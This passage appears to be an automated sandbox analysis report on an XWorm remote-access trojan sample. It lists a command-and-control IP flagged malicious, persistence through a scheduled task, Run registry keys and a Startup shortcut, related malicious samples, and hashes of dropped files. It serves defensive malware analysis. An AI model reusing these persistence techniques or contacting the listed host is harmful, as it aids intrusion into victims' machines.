                  C:\Users\user\AppData\Roaming\localsys64.exe79%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  147.185.221.22true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.micpowershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micft.cMicRosofpowershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              147.185.221.22
                              		unknownUnited States
                              		12087SALSGIVERUStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1539518
                              Start date and time:2024-10-22 19:28:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 8s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:fjijTlM2tu.exe
                              renamed because original name is a hash value
                              Original Sample Name:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@19/21@0/1
                              EGA Information:
                              • Successful, ratio: 12.5%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 80
                              • Number of non-executed functions: 8
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target localsys64.exe, PID 4600 because it is empty
                              • Execution Graph export aborted for target localsys64.exe, PID 6112 because it is empty
                              • Execution Graph export aborted for target localsys64.exe, PID 6428 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 332 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3412 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6660 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: fjijTlM2tu.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              13:29:00API Interceptor57x Sleep call for process: powershell.exe modified
                              13:30:12API Interceptor63285x Sleep call for process: fjijTlM2tu.exe modified
                              18:29:56Task SchedulerRun new task: localsys64 path: C:\Users\user\AppData\Roaming\localsys64.exe
                              18:29:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run localsys64 C:\Users\user\AppData\Roaming\localsys64.exe
                              18:30:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run localsys64 C:\Users\user\AppData\Roaming\localsys64.exe
                              18:30:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              147.185.221.22gPEbJi1xiY.exeGet hashmaliciousXWormBrowse
                                dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                  432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                    l18t80u9zg.exeGet hashmaliciousXWormBrowse
                                      Windows Defender.exeGet hashmaliciousXWormBrowse
                                        e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                          SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exeGet hashmaliciousNjratBrowse
                                            Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                              e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                BootstrapperV1.19.exeGet hashmaliciousXWormBrowse

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  SALSGIVERUSSecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                                  • 147.185.221.21
                                                  gPEbJi1xiY.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.22
                                                  lx3vLwrX57.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.23
                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                  • 147.168.93.87
                                                  file.exeGet hashmaliciousAsyncRATBrowse
                                                  • 147.185.221.20
                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                  • 147.168.203.92
                                                  MjrlHJvNyq.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.20
                                                  r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.18
                                                  SpeedHack666Cheat (no VM detected).exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                  • 147.185.221.23
                                                  mIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.21

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\localsys64.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):41
                                                  Entropy (8bit):3.7195394315431693
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                  MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                  SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                  SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                  SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vopsxsx.2vs.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uym1u3g.e12.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckfn2l00.vot.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3d4hpul.syq.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5ueropf.wxm.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggx2usj4.shd.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihkkwt1a.ouy.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lc3bfise.bdl.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfosrqc2.2m5.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj0t4vwg.d3p.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_payg1px1.it0.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ri0gek2c.dsw.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2tuh2tc.fs3.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyphgd30.h5p.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcf1whbx.k2v.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs1kzmpf.k4g.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
